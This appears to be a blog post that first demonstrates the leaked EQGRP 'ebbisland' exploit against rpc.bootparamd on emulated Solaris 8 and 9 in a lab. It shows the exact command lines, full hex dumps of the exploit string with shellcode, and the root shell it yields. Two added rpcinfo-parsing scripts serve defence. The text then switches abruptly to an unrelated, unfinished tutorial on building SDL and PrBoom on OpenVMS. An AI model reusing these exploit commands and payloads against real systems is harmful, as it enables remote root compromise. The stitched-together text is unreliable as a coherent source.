So let's fire up our first test case, Solaris 5.9 (sparc) under qemu-system-sparc as described here ( https://astr0baby.wordpress.com/2019/02/23/running-solaris-2-9-sparc-on-qemu-system-sparc-in-linux-x86_64-mint-19/ ). We need to make sure rpc.bootparamd is running on the target (it is the service this example attacks).

From the Linux host we first confirm that the vulnerable RPC service (bootparam, program number 100026) is registered with the target's portmapper and that the TCP port it listens on is reachable, since ebbisland talks to that port directly. rpcinfo does the query:

Make sure you have it installed ->  apt-get install rpcbind  nfs-common

user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ rpcinfo -p 10.0.2.10
program vers proto port service
100000 4 tcp 111 portmapper
100000 3 tcp 111 portmapper
100000 2 tcp 111 portmapper
100000 4 udp 111 portmapper
100000 3 udp 111 portmapper
100000 2 udp 111 portmapper
100232 10 udp 32772
100083 1 tcp 32771
100221 1 tcp 32772
100229 1 tcp 32773
100229 2 tcp 32773
100230 1 tcp 32774
100242 1 tcp 32775
100422 1 tcp 32776
100068 2 udp 32773
100068 3 udp 32773
100068 4 udp 32773
100068 5 udp 32773
100011 1 udp 32774 rquotad
100001 2 udp 32775 rstatd
100001 3 udp 32775 rstatd
100001 4 udp 32775 rstatd
100002 2 udp 32776 rusersd
100002 3 udp 32776 rusersd
100002 2 tcp 32777 rusersd
100002 3 tcp 32777 rusersd
100008 1 udp 32777 walld
100012 1 udp 32778 sprayd
100024 1 udp 32779 status
100024 1 tcp 32778 status
100133 1 udp 32779
100133 1 tcp 32778
100021 1 udp 4045 nlockmgr
100021 2 udp 4045 nlockmgr
100021 3 udp 4045 nlockmgr
100021 4 udp 4045 nlockmgr
100021 1 tcp 4045 nlockmgr
100021 2 tcp 4045 nlockmgr
100021 3 tcp 4045 nlockmgr
100021 4 tcp 4045 nlockmgr
300598 1 udp 32785
300598 1 tcp 32782
805306368 1 udp 32785
805306368 1 tcp 32782
100249 1 udp 32786
100249 1 tcp 32783
1289637086 5 tcp 32784
1289637086 1 tcp 32784
100026 1 udp 32806 bootparam
100026 1 tcp 32848 bootparam

From the listing above, bootparam (program 100026) is registered on UDP 32806 and TCP 32848; ebbisland talks to the TCP port, so we execute it as follows
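The same port selection as a script, added here as an example (not part of the EQGRP dump or of the original post): it parses `rpcinfo -p` output, including the lines for programs the client cannot name, returns the ports on which a given RPC program is registered, and, for the defensive view, summarises everything the portmapper exposes. The sample text is a constructed, trimmed copy of the listing above.

```python
import re

# Constructed sample: a trimmed copy of the `rpcinfo -p 10.0.2.10` listing above
SAMPLE_RPCINFO = """\
program vers proto port service
100000 4 tcp 111 portmapper
100000 2 udp 111 portmapper
100232 10 udp 32772
100001 4 udp 32775 rstatd
100021 4 tcp 4045 nlockmgr
100026 1 udp 32806 bootparam
100026 1 tcp 32848 bootparam
"""

BOOTPARAM = 100026   # rpc.bootparamd, the program ebbisland is pointed at with -r
LINE_RE = re.compile(r"^\s*(\d+)\s+(\d+)\s+(tcp|udp)\s+(\d+)(?:\s+(\S+))?\s*$")


def parse_rpcinfo(text: str) -> list:
    """Parse `rpcinfo -p` output into dicts; programs the client cannot name get service=None."""
    entries = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                      # header, blank line, or an rpcinfo error message
        prog, vers, proto, port, name = m.groups()
        entries.append({"program": int(prog), "version": int(vers),
                        "proto": proto, "port": int(port), "service": name})
    return entries


def ports_for(text: str, program: int = BOOTPARAM, proto: str = "tcp") -> list:
    """Ports on which `program` is registered over `proto`, sorted (the -p value for ebbisland)."""
    return sorted({e["port"] for e in parse_rpcinfo(text)
                   if e["program"] == program and e["proto"] == proto})


def exposure_summary(text: str) -> dict:
    """Defender's view: every registered program -> set of (proto, port), to compare against
    what the host is actually supposed to serve."""
    summary = {}
    for e in parse_rpcinfo(text):
        key = e["service"] or "prog-%d" % e["program"]
        summary.setdefault(key, set()).add((e["proto"], e["port"]))
    return summary


if __name__ == "__main__":
    import sys
    text = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_RPCINFO
    for name, eps in sorted(exposure_summary(text).items()):
        print("%-12s %s" % (name, ", ".join("%s/%d" % ep for ep in sorted(eps))))
    print("bootparam over tcp:", ports_for(text) or "not registered")
```

Usage: `rpcinfo -p 10.0.2.10 | python3 rpc_triage.py`. Because bootparam registers on a dynamic port, a firewall rule on TCP 111 alone does not hide it from an attacker who can guess or scan the 327xx range; the fix on the Solaris side is to disable rpc.bootparamd in /etc/inetd.conf.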

user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ ./ebbisland -t 10.0.2.10 -p 32848 -r 100026 -X -N -A 0x6e908

The exploit takes a couple of seconds to complete and is quite reliable

user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ ./ebbisland -t 10.0.2.10 -p 32848 -r 100026 -X -N -A 0x6e908
./ebbisland version 1.0.0.0

************************************
**** WARNING - non - inetd mode ****
************************************

auth len 192
lz addr: 0x6e9f4, codeAddr: 0x6e94c jumpOffset: 0x1c
landing zone size: 1024
Address range covered: 0x6e70c -> 0x6eb08

Ok to continue? y
Exploit string:
80 00 04 e8 73 d5 72 cb 00 00 00 00 00 00 00 02 ....s.r.........
00 01 86 ba 00 00 00 00 00 00 00 00 00 00 55 de ..............U.
00 00 00 c0 5c 74 67 c3 00 00 00 09 31 32 37 2e ....\tg.....127.
30 2e 30 2e 31 00 00 00 00 00 00 00 00 00 00 00 0.0.1...........
00 00 00 28 82 10 20 06 90 10 20 02 91 d0 20 08 ...(.. ... ... .
90 10 20 01 91 d0 20 08 91 d0 20 08 82 10 20 1b .. ... ... ... .
91 d0 20 08 b0 10 24 00 82 10 20 29 90 10 00 18 .. ...$... )....
91 d0 20 08 2a bf ff fd b0 a6 20 01 91 d0 20 08 .. .*..... ... .
91 d0 20 08 11 0b d8 98 90 02 29 6e 13 0b dc d8 .. .......)n....
92 02 68 00 d0 3b bf e0 90 23 a0 20 92 23 a0 18 ..h..;...#. .#..
96 23 a0 1b d6 22 40 00 c0 22 60 04 82 10 20 0b .#..."@.."`... .
91 d0 20 08 90 1a 00 08 82 10 20 01 91 d0 20 08 .. ....... ... .
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 06 eb dc ................
00 00 00 00 00 00 00 00 00 00 00 00 00 06 eb 4c ...............L
00 06 eb 48 00 06 eb 44 00 06 eb 40 00 06 eb 3c ...H...D...@...<
00 06 eb 38 00 06 eb 34 00 06 eb 30 00 06 eb 2c ...8...4...0...,
00 06 eb 28 00 06 eb 24 00 06 eb 20 00 06 eb 1c ...(...$... ....
00 06 eb 18 00 06 eb 14 00 06 eb 10 00 06 eb 0c ................
00 06 eb 08 00 06 eb 04 00 06 eb 00 00 06 ea fc ................
00 06 ea f8 00 06 ea f4 00 06 ea f0 00 06 ea ec ................
00 06 ea e8 00 06 ea e4 00 06 ea e0 00 06 ea dc ................
00 06 ea d8 00 06 ea d4 00 06 ea d0 00 06 ea cc ................
00 06 ea c8 00 06 ea c4 00 06 ea c0 00 06 ea bc ................
00 06 ea b8 00 06 ea b4 00 06 ea b0 00 06 ea ac ................
00 06 ea a8 00 06 ea a4 00 06 ea a0 00 06 ea 9c ................
00 06 ea 98 00 06 ea 94 00 06 ea 90 00 06 ea 8c ................
00 06 ea 88 00 06 ea 84 00 06 ea 80 00 06 ea 7c ...............|
00 06 ea 78 00 06 ea 74 00 06 ea 70 00 06 ea 6c ...x...t...p...l
00 06 ea 68 00 06 ea 64 00 06 ea 60 00 06 ea 5c ...h...d...`...\
00 06 ea 58 00 06 ea 54 00 06 ea 50 00 06 ea 4c ...X...T...P...L
00 06 ea 48 00 06 ea 44 00 06 ea 40 00 06 ea 3c ...H...D...@...<
00 06 ea 38 00 06 ea 34 00 06 ea 30 00 06 ea 2c ...8...4...0...,
00 06 ea 28 00 06 ea 24 00 06 ea 20 00 06 ea 1c ...(...$... ....
00 06 ea 18 00 06 ea 14 00 06 ea 10 00 06 ea 0c ................
00 06 ea 08 00 06 ea 04 00 06 ea 00 00 06 e9 fc ................
00 06 e9 f8 00 06 e9 f4 00 06 e9 f0 00 06 e9 ec ................
00 06 e9 e8 00 06 e9 e4 00 06 e9 e0 00 06 e9 dc ................
00 06 e9 d8 00 06 e9 d4 00 06 e9 d0 00 06 e9 cc ................
00 06 e9 c8 00 06 e9 c4 00 06 e9 c0 00 06 e9 bc ................
00 06 e9 b8 00 06 e9 b4 00 06 e9 b0 00 06 e9 ac ................
00 06 e9 a8 00 06 e9 a4 00 06 e9 a0 00 06 e9 9c ................
00 06 e9 98 00 06 e9 94 00 06 e9 90 00 06 e9 8c ................
00 06 e9 88 00 06 e9 84 00 06 e9 80 00 06 e9 7c ...............|
00 06 e9 78 00 06 e9 74 00 06 e9 70 00 06 e9 6c ...x...t...p...l
00 06 e9 68 00 06 e9 64 00 06 e9 60 00 06 e9 5c ...h...d...`...\
00 06 e9 58 00 06 e9 54 00 06 e9 50 00 06 e9 4c ...X...T...P...L
00 06 e9 48 00 06 e9 44 00 06 e9 40 00 06 e9 3c ...H...D...@...<
00 06 e9 38 00 06 e9 34 00 06 e9 30 00 06 e9 2c ...8...4...0...,
00 06 e9 28 00 06 e9 24 00 06 e9 20 00 06 e9 1c ...(...$... ....
00 06 e9 18 00 06 e9 14 00 06 e9 10 00 06 e9 0c ................
00 06 e9 08 00 06 e9 04 00 06 e9 00 00 06 e8 fc ................
00 06 e8 f8 00 06 e8 f4 00 06 e8 f0 00 06 e8 ec ................
00 06 e8 e8 00 06 e8 e4 00 06 e8 e0 00 06 e8 dc ................
00 06 e8 d8 00 06 e8 d4 00 06 e8 d0 00 06 e8 cc ................
00 06 e8 c8 00 06 e8 c4 00 06 e8 c0 00 06 e8 bc ................
00 06 e8 b8 00 06 e8 b4 00 06 e8 b0 00 06 e8 ac ................
00 06 e8 a8 00 06 e8 a4 00 06 e8 a0 00 06 e8 9c ................
00 06 e8 98 00 06 e8 94 00 06 e8 90 00 06 e8 8c ................
00 06 e8 88 00 06 e8 84 00 06 e8 80 00 06 e8 7c ...............|
00 06 e8 78 00 06 e8 74 00 06 e8 70 00 06 e8 6c ...x...t...p...l
00 06 e8 68 00 06 e8 64 00 06 e8 60 00 06 e8 5c ...h...d...`...\
00 06 e8 58 00 06 e8 54 00 06 e8 50 00 06 e8 4c ...X...T...P...L
00 06 e8 48 00 06 e8 44 00 06 e8 40 00 06 e8 3c ...H...D...@...<
00 06 e8 38 00 06 e8 34 00 06 e8 30 00 06 e8 2c ...8...4...0...,
00 06 e8 28 00 06 e8 24 00 06 e8 20 00 06 e8 1c ...(...$... ....
00 06 e8 18 00 06 e8 14 00 06 e8 10 00 06 e8 0c ................
00 06 e8 08 00 06 e8 04 00 06 e8 00 00 06 e7 fc ................
00 06 e7 f8 00 06 e7 f4 00 06 e7 f0 00 06 e7 ec ................
00 06 e7 e8 00 06 e7 e4 00 06 e7 e0 00 06 e7 dc ................
00 06 e7 d8 00 06 e7 d4 00 06 e7 d0 00 06 e7 cc ................
00 06 e7 c8 00 06 e7 c4 00 06 e7 c0 00 06 e7 bc ................
00 06 e7 b8 00 06 e7 b4 00 06 e7 b0 00 06 e7 ac ................
00 06 e7 a8 00 06 e7 a4 00 06 e7 a0 00 06 e7 9c ................
00 06 e7 98 00 06 e7 94 00 06 e7 90 00 06 e7 8c ................
00 06 e7 88 00 06 e7 84 00 06 e7 80 00 06 e7 7c ...............|
00 06 e7 78 00 06 e7 74 00 06 e7 70 00 06 e7 6c ...x...t...p...l
00 06 e7 68 00 06 e7 64 00 06 e7 60 00 06 e7 5c ...h...d...`...\
00 06 e7 58 00 06 e7 54 00 06 e7 50 ...X...T...P
Timed out waiting for RPC response
id
uid=0(root) gid=1(other)
pwd
/usr/sbin
uname -a
SunOS solaris9 5.9 Generic_118558-34 sun4m sparc SUNW,SPARCstation-5

A similar approach was tested against Solaris 5.8 (sparc), except that the address was different.

Querying the remote RPC service:

user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ rpcinfo -p 10.0.2.10 | grep bootparam
100026 1 udp 32806 bootparam
100026 1 tcp 32854 bootparam
user@panasonic ~/SHADOWBROKERS/EQGRP-master/Linux/bin $ ./ebbisland -t 10.0.2.10 -p 32854 -r 100026 -X -N -A 0x7c760
./ebbisland version 1.0.0.0

************************************
**** WARNING - non - inetd mode ****
************************************

auth len 192
lz addr: 0x7c84c, codeAddr: 0x7c7a4 jumpOffset: 0x1c
landing zone size: 1024
Address range covered: 0x7c564 -> 0x7c960

Ok to continue? y
Exploit string:
80 00 04 e8 71 6e f1 5f 00 00 00 00 00 00 00 02 ....qn._........
00 01 86 ba 00 00 00 00 00 00 00 00 00 00 55 de ..............U.
00 00 00 c0 5c 74 72 d2 00 00 00 09 31 32 37 2e ....\tr.....127.
30 2e 30 2e 31 00 00 00 00 00 00 00 00 00 00 00 0.0.1...........
00 00 00 28 82 10 20 06 90 10 20 02 91 d0 20 08 ...(.. ... ... .
90 10 20 01 91 d0 20 08 91 d0 20 08 82 10 20 1b .. ... ... ... .
91 d0 20 08 b0 10 24 00 82 10 20 29 90 10 00 18 .. ...$... )....
91 d0 20 08 2a bf ff fd b0 a6 20 01 91 d0 20 08 .. .*..... ... .
91 d0 20 08 11 0b d8 98 90 02 29 6e 13 0b dc d8 .. .......)n....
92 02 68 00 d0 3b bf e0 90 23 a0 20 92 23 a0 18 ..h..;...#. .#..
96 23 a0 1b d6 22 40 00 c0 22 60 04 82 10 20 0b .#..."@.."`... .
91 d0 20 08 90 1a 00 08 82 10 20 01 91 d0 20 08 .. ....... ... .
00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00 00 00 00 00 00 00 00 00 00 00 00 00 07 ca 34 ...............4
00 00 00 00 00 00 00 00 00 00 00 00 00 07 c9 a4 ................
00 07 c9 a0 00 07 c9 9c 00 07 c9 98 00 07 c9 94 ................
00 07 c9 90 00 07 c9 8c 00 07 c9 88 00 07 c9 84 ................
00 07 c9 80 00 07 c9 7c 00 07 c9 78 00 07 c9 74 .......|...x...t
00 07 c9 70 00 07 c9 6c 00 07 c9 68 00 07 c9 64 ...p...l...h...d
00 07 c9 60 00 07 c9 5c 00 07 c9 58 00 07 c9 54 ...`...\...X...T
00 07 c9 50 00 07 c9 4c 00 07 c9 48 00 07 c9 44 ...P...L...H...D
00 07 c9 40 00 07 c9 3c 00 07 c9 38 00 07 c9 34 ...@...<...8...4
00 07 c9 30 00 07 c9 2c 00 07 c9 28 00 07 c9 24 ...0...,...(...$
00 07 c9 20 00 07 c9 1c 00 07 c9 18 00 07 c9 14 ... ............
00 07 c9 10 00 07 c9 0c 00 07 c9 08 00 07 c9 04 ................
00 07 c9 00 00 07 c8 fc 00 07 c8 f8 00 07 c8 f4 ................
00 07 c8 f0 00 07 c8 ec 00 07 c8 e8 00 07 c8 e4 ................
00 07 c8 e0 00 07 c8 dc 00 07 c8 d8 00 07 c8 d4 ................
00 07 c8 d0 00 07 c8 cc 00 07 c8 c8 00 07 c8 c4 ................
00 07 c8 c0 00 07 c8 bc 00 07 c8 b8 00 07 c8 b4 ................
00 07 c8 b0 00 07 c8 ac 00 07 c8 a8 00 07 c8 a4 ................
00 07 c8 a0 00 07 c8 9c 00 07 c8 98 00 07 c8 94 ................
00 07 c8 90 00 07 c8 8c 00 07 c8 88 00 07 c8 84 ................
00 07 c8 80 00 07 c8 7c 00 07 c8 78 00 07 c8 74 .......|...x...t
00 07 c8 70 00 07 c8 6c 00 07 c8 68 00 07 c8 64 ...p...l...h...d
00 07 c8 60 00 07 c8 5c 00 07 c8 58 00 07 c8 54 ...`...\...X...T
00 07 c8 50 00 07 c8 4c 00 07 c8 48 00 07 c8 44 ...P...L...H...D
00 07 c8 40 00 07 c8 3c 00 07 c8 38 00 07 c8 34 ...@...<...8...4
00 07 c8 30 00 07 c8 2c 00 07 c8 28 00 07 c8 24 ...0...,...(...$
00 07 c8 20 00 07 c8 1c 00 07 c8 18 00 07 c8 14 ... ............
00 07 c8 10 00 07 c8 0c 00 07 c8 08 00 07 c8 04 ................
00 07 c8 00 00 07 c7 fc 00 07 c7 f8 00 07 c7 f4 ................
00 07 c7 f0 00 07 c7 ec 00 07 c7 e8 00 07 c7 e4 ................
00 07 c7 e0 00 07 c7 dc 00 07 c7 d8 00 07 c7 d4 ................
00 07 c7 d0 00 07 c7 cc 00 07 c7 c8 00 07 c7 c4 ................
00 07 c7 c0 00 07 c7 bc 00 07 c7 b8 00 07 c7 b4 ................
00 07 c7 b0 00 07 c7 ac 00 07 c7 a8 00 07 c7 a4 ................
00 07 c7 a0 00 07 c7 9c 00 07 c7 98 00 07 c7 94 ................
00 07 c7 90 00 07 c7 8c 00 07 c7 88 00 07 c7 84 ................
00 07 c7 80 00 07 c7 7c 00 07 c7 78 00 07 c7 74 .......|...x...t
00 07 c7 70 00 07 c7 6c 00 07 c7 68 00 07 c7 64 ...p...l...h...d
00 07 c7 60 00 07 c7 5c 00 07 c7 58 00 07 c7 54 ...`...\...X...T
00 07 c7 50 00 07 c7 4c 00 07 c7 48 00 07 c7 44 ...P...L...H...D
00 07 c7 40 00 07 c7 3c 00 07 c7 38 00 07 c7 34 ...@...<...8...4
00 07 c7 30 00 07 c7 2c 00 07 c7 28 00 07 c7 24 ...0...,...(...$
00 07 c7 20 00 07 c7 1c 00 07 c7 18 00 07 c7 14 ... ............
00 07 c7 10 00 07 c7 0c 00 07 c7 08 00 07 c7 04 ................
00 07 c7 00 00 07 c6 fc 00 07 c6 f8 00 07 c6 f4 ................
00 07 c6 f0 00 07 c6 ec 00 07 c6 e8 00 07 c6 e4 ................
00 07 c6 e0 00 07 c6 dc 00 07 c6 d8 00 07 c6 d4 ................
00 07 c6 d0 00 07 c6 cc 00 07 c6 c8 00 07 c6 c4 ................
00 07 c6 c0 00 07 c6 bc 00 07 c6 b8 00 07 c6 b4 ................
00 07 c6 b0 00 07 c6 ac 00 07 c6 a8 00 07 c6 a4 ................
00 07 c6 a0 00 07 c6 9c 00 07 c6 98 00 07 c6 94 ................
00 07 c6 90 00 07 c6 8c 00 07 c6 88 00 07 c6 84 ................
00 07 c6 80 00 07 c6 7c 00 07 c6 78 00 07 c6 74 .......|...x...t
00 07 c6 70 00 07 c6 6c 00 07 c6 68 00 07 c6 64 ...p...l...h...d
00 07 c6 60 00 07 c6 5c 00 07 c6 58 00 07 c6 54 ...`...\...X...T
00 07 c6 50 00 07 c6 4c 00 07 c6 48 00 07 c6 44 ...P...L...H...D
00 07 c6 40 00 07 c6 3c 00 07 c6 38 00 07 c6 34 ...@...<...8...4
00 07 c6 30 00 07 c6 2c 00 07 c6 28 00 07 c6 24 ...0...,...(...$
00 07 c6 20 00 07 c6 1c 00 07 c6 18 00 07 c6 14 ... ............
00 07 c6 10 00 07 c6 0c 00 07 c6 08 00 07 c6 04 ................
00 07 c6 00 00 07 c5 fc 00 07 c5 f8 00 07 c5 f4 ................
00 07 c5 f0 00 07 c5 ec 00 07 c5 e8 00 07 c5 e4 ................
00 07 c5 e0 00 07 c5 dc 00 07 c5 d8 00 07 c5 d4 ................
00 07 c5 d0 00 07 c5 cc 00 07 c5 c8 00 07 c5 c4 ................
00 07 c5 c0 00 07 c5 bc 00 07 c5 b8 00 07 c5 b4 ................
00 07 c5 b0 00 07 c5 ac 00 07 c5 a8 ............
Timed out waiting for RPC response
id
uid=0(root) gid=1(other)
uname -a
SunOS solaris8 5.8 Generic_108528-13 sun4m sparc SUNW,SPARCstation-5

 

The parameters were taken from the original ebbisland help file located here

https://fdik.org/EQGRP/Linux/etc/opscript.txt

Video demonstration of the above
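From the defender's side, the same rpcinfo -p listings shown above are the starting point for hardening such a host: every program registered with the portmapper is reachable by anyone who can reach its port, and the bootparam entries are exactly the kind of legacy registration that should not be exposed. As an added example (not code from the post, from the EQGRP archive or from any tool named here), the following Python parser turns that listing into an inventory and reports every registration that is not on an explicit allowlist. The sample listing is constructed in the layout of the post's output and the allowlist is an assumption.

```python
"""Inventory of RPC registrations from `rpcinfo -p` output, checked against an allowlist."""
from dataclasses import dataclass
from typing import Dict, Iterable, List, Set

# Subset of the standard rpc(5) program-number table, used when rpcinfo prints no service name.
RPC_NAMES: Dict[int, str] = {
    100000: "portmapper", 100003: "nfs", 100005: "mountd",
    100021: "nlockmgr", 100024: "status", 100026: "bootparam",
}


@dataclass(frozen=True)
class RpcRegistration:
    program: int
    version: int
    proto: str
    port: int
    name: str


def parse_rpcinfo(text: str) -> List[RpcRegistration]:
    """Parse `rpcinfo -p` lines of the form: program vers proto port [service]."""
    regs: List[RpcRegistration] = []
    for raw in text.splitlines():
        parts = raw.split()
        if len(parts) < 4:
            continue  # blank line or otherwise too short to be a registration
        try:
            program, version, port = int(parts[0]), int(parts[1]), int(parts[3])
        except ValueError:
            continue  # the "program vers proto port service" header or a malformed line
        name = parts[4] if len(parts) > 4 else RPC_NAMES.get(program, "unknown")
        regs.append(RpcRegistration(program, version, parts[2].lower(), port, name))
    return regs


def unexpected_exposures(regs: Iterable[RpcRegistration], allowed: Set[int]) -> List[RpcRegistration]:
    """Registrations whose program number is not allowlisted, one entry per (program, proto, port)
    so that several versions of the same service are reported once."""
    seen = set()
    out: List[RpcRegistration] = []
    for r in regs:
        key = (r.program, r.proto, r.port)
        if r.program in allowed or key in seen:
            continue
        seen.add(key)
        out.append(r)
    return out


def report(text: str, allowed: Set[int]) -> List[str]:
    """Human-readable lines for everything that should not be registered on this host."""
    return [f"{r.name} (program {r.program}) on {r.proto}/{r.port}"
            for r in unexpected_exposures(parse_rpcinfo(text), allowed)]


# Constructed sample in the layout of the post's rpcinfo -p listings (not captured from a live host).
SAMPLE_RPCINFO = """\
   program vers proto   port  service
    100000    4   tcp    111  portmapper
    100000    4   udp    111  portmapper
1289637086    5   tcp  32784
1289637086    1   tcp  32784
    100026    1   udp  32806  bootparam
    100026    1   tcp  32848  bootparam
"""

# Assumed policy: only the portmapper itself is expected to be registered.
ALLOWED_PROGRAMS: Set[int] = {100000}

if __name__ == "__main__":
    for line in report(SAMPLE_RPCINFO, ALLOWED_PROGRAMS):
        print("unexpected RPC registration:", line)
```

Feed it the real output of rpcinfo -p instead of SAMPLE_RPCINFO and widen ALLOWED_PROGRAMS to what the host is actually meant to serve; anything it still reports (here the unnamed program 1289637086 and both bootparam registrations) is a candidate for being disabled or firewalled.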

Compiling PrBoom on OpenVMS 8.4 (Alpha)


This was something I had wanted to do for a while but could not find the courage and time to do. Who would not want to play the most legendary game id Software ever made?

!!! We will do so on the OpenVMS system !!!!

First of all I would like to mention that most of the porting of SDL as well as the PrBoom code was done by Alexey Chupahin, whose original site is no longer accessible (it was located at http://fafner.dyndns.org/%7Ealexey/libsdl/public.html ). Unfortunately, only incomplete snapshots exist on archive.org, from which we cannot download the needed OpenVMS configure.com files and the source code for the particular versions.

Luckily, an almost complete archive of the needed source files as well as the VMS patches can be found here: http://nchrem.tnw.tudelft.nl/openvms/software2.html#SDL

I have downloaded all the needed files so that it is easier for us to compile and build the needed libraries in order to play Doom on OpenVMS. This is divided into multiple steps, which we will go through.

All the files below are available from my archive here: http://45.76.81.249/OpenVMS/Alpha/

Prerequisites

– OpenVMS Alpha C and C++ compilers (I'm using HP C V7.3-009 and HP C++ V7.3-009 for OpenVMS Alpha V8.4) and the corresponding licenses for these (you can get the hobbyist ones as I have described here: https://astr0baby.wordpress.com/2017/10/22/setting-up-dw-motif-on-openvms-8-4-2-alphavm-linux64/ ), as well as a fully working TCPIP environment and the DW-MOTIF X11 environment. I am not going to cover the C and CXX installation procedure here.

Step 1. Building MMK

We first need to build the OpenVMS MMK (Make) utility in order to work with the SDL and PRBOOM configure.com scripts.

We can download the ZIP archive from here http://45.76.81.249/OpenVMS/Alpha/mmk.zip

The mmk.zip needs to be uploaded to the OpenVMS environment via FTP or SCP (I use FTP), so let's first create a build directory structure on the remote OpenVMS side. In order to make things simple I'm running my simulation under the SYSTEM account and create the following structure on my primary disk:

SYS$SYSROOT:[SYSMGR.BUILD.MMK]   <– this will hold the mmk.zip (make sure to use bin mode when uploading binary files)

230 User logged in.
Remote system type is VMS.
ftp> bin
200 TYPE set to IMAGE.
ftp> pwd
257 "SYS$SYSROOT:[SYSMGR.BUILD]" is current directory.
ftp> mkdir MMK
257 "SYS$SYSROOT:[SYSMGR.BUILD.MMK]" directory created.
ftp> cd MMK
250-CWD command successful.
250 New default directory is SYS$SYSROOT:[SYSMGR.BUILD.MMK]
ftp> put mmk.zip
local: mmk.zip remote: mmk.zip
200 PORT command successful.
150 Opening data connection for SYS$COMMON:[SYSMGR.BUILD.MMK]mmk.zip;1 (10.0.2.2,48665)
226 Transfer complete.
451343 bytes sent in 0.07 secs (6.5853 MB/s)
ftp>

We will also need to upload UNZIP.EXE from http://45.76.81.249/OpenVMS/Alpha/unzip.exe and place it in the SYS$SYSROOT:[SYSMGR.BUILD.MMK] directory to extract the mmk.zip, as well as VMSTAR.EXE from http://45.76.81.249/OpenVMS/Alpha/vmstar.exe

ftp> pwd
257 "SYS$SYSROOT:[SYSMGR.BUILD]" is current directory.
ftp> mkdi MMK
257 "SYS$SYSROOT:[SYSMGR.BUILD.MMK]" directory created.
ftp> cd MMK
250-CWD command successful.
250 New default directory is SYS$SYSROOT:[SYSMGR.BUILD.MMK]
ftp> put mmk.zip
local: mmk.zip remote: mmk.zip
200 PORT command successful.
150 Opening data connection for SYS$COMMON:[SYSMGR.BUILD.MMK]mmk.zip;1 (10.0.2.2,44533)
226 Transfer complete.
451343 bytes sent in 0.05 secs (9.3386 MB/s)
ftp>


230 User logged in.
Remote system type is VMS.
ftp> bin
200 TYPE set to IMAGE.
ftp> cd BUILD
250-CWD command successful.
250 New default directory is SYS$SYSROOT:[SYSMGR.BUILD]
ftp> put vmstar.exe
local: vmstar.exe remote: vmstar.exe
200 PORT command successful.
150 Opening data connection for SYS$SYSROOT:[SYSMGR.BUILD]vmstar.exe;2 (10.0.2.2,57935)
226 Transfer complete.
42496 bytes sent in 0.00 secs (519.5814 MB/s)
ftp>

Now we can extract the mmk.zip and build it. This is done simply by defining a foreign command symbol for UNZIP.EXE and running it against the ZIP archive:

$ unzip :== $SYS$SYSROOT:[SYSMGR.BUILD.MMK]unzip.exe
$ unzip mmk.zip 
Archive: SYS$SYSROOT:[SYSMGR.BUILD.MMK]mmk.zip;1
<---cut--->
inflating: [.source]tpadef.h 
$

Next we run the @link.com script to build MMK

$ @link.com
$ LINK/EXEC=MMK.EXE/NOTRACE MMK.Alpha_OPT/OPT
COLLECT=CLUSTER1,$$$COPYRIGHT
BIN_DIR:MMK.OLB/INCLUDE=(MMK,DEFAULT_RULES)/LIB
$ dir *.exe

Directory SYS$SYSROOT:[SYSMGR.BUILD.MMK]

MMK.EXE;1 unzip.exe;1

We will now define the MMK.EXE path for the next builds since it is needed for the SDL and PrBoom configure.com scripts

$ mmk :== $SYS$SYSROOT:[SYSMGR.BUILD.MMK]mmk.exe

Step 2. Building SDL-1.2.14

Now we can return back to the core build directory and upload SDL

$ set def SYS$SYSROOT:[SYSMGR.BUILD]

SDL-1.2.14 can be downloaded from here

http://45.76.81.249/OpenVMS/Alpha/SDL-1_2_14.ZIP 

and the OpenVMS SDL-1_2_14-PATCH here

http://45.76.81.249/OpenVMS/Alpha/SDL-1_2_14-VMSPATCH.TAR

We extract the SDL-1_2_14.ZIP and the SDL-1_2_14-VMSPATCH.TAR archives, patch the sources and build the libraries.

$ unzip sdl-1_2_14.zip
$ vmstar :== $SYS$SYSROOT:[SYSMGR.BUILD]vmstar.exe
$ vmstar -xvf sdl-1_2_14-vmspatch.tar
$ set def SYS$SYSROOT:[SYSMGR.BUILD.sdl-1_2_14]

$ @configure.com
 
Configuring LIBSDL library
(c) Alexey Chupahin
alexey@vaxman.de
Rostov-on-Don, Russia
 
Checking architecture 	...  Alpha
Compiler		...  DEC C
Checking build utility	...  MMK
 
Checking for getenv ...   Yes
Checking for nanosleep ...   Yes
Checking for snprintf ...   Yes
Checking for vsnprintf ...   Yes
Checking for stdint.h ...   No
Checking for X11 ...   Yes
Checking for OpenVMS Multimedia  ...   No
OpenGL library support ...   No
*******************************************
Now type
@BUILD
$ 
$ @BUILD 

<-- cut -->  AFTER SOME TIME <-- cut --> 

COPY sdl$shr.exe SYS$SHARE:
 
***************************************************************************** 
LIBSDL$STARTUP.COM has been created. 
This file setups all logicals needed. It should be execute before using LibSDL 
Nice place to call it - LOGIN.COM 
Usage:
CC/INC=SDL TEST
LINK/THREAD=UP TEST,LIBSDL:LIBSDL$SHR/OPT
or
LINK/THREAD=UP TEST,LIBSDL:LIBSDL/OPT
for static libSDL
***************************************************************************** 


So now we are ready to define the SDL logicals for the next build, SDL-Mixer, which we do simply by executing the LIBSDL$STARTUP.COM script:

$ @LIBSDL$STARTUP.COM

Step 3. Building SDL-mixer1.2.8b

We change back to the BUILD directory and upload and extract the SDL-Mixer source and Patches. You can get the SDL-Mixer source here

http://45.76.81.249/OpenVMS/Alpha/SDL_mixer-1.2.8b.zip

and the OpenVMS patches here

http://45.76.81.249/OpenVMS/Alpha/SDL_MIXER-1_2_8b-VMSPATCH.zip

We upload them via FTP to SYS$SYSROOT:[SYSMGR.BUILD], then extract, patch and compile:

$ set def SYS$SYSROOT:[SYSMGR.BUILD]
$ unzip SDL_MIXER-1_2_8b.zip
$ unzip SDL_MIXER-1_2_8b-VMSPATCH.zip
$ set DEF SYS$SYSROOT:[SYSMGR.BUILD.sdl_mixer-1_2_8b]
$ @configure.com
 
Configuring SDL_Mixer library
(c) Alexey Chupahin aka CHAPG
 
Checking architecture   ...  Alpha
Checking OS             ...  OpenVMS V8.4    
Compiler		...  DEC C
Checking build utility	...  MMK
 
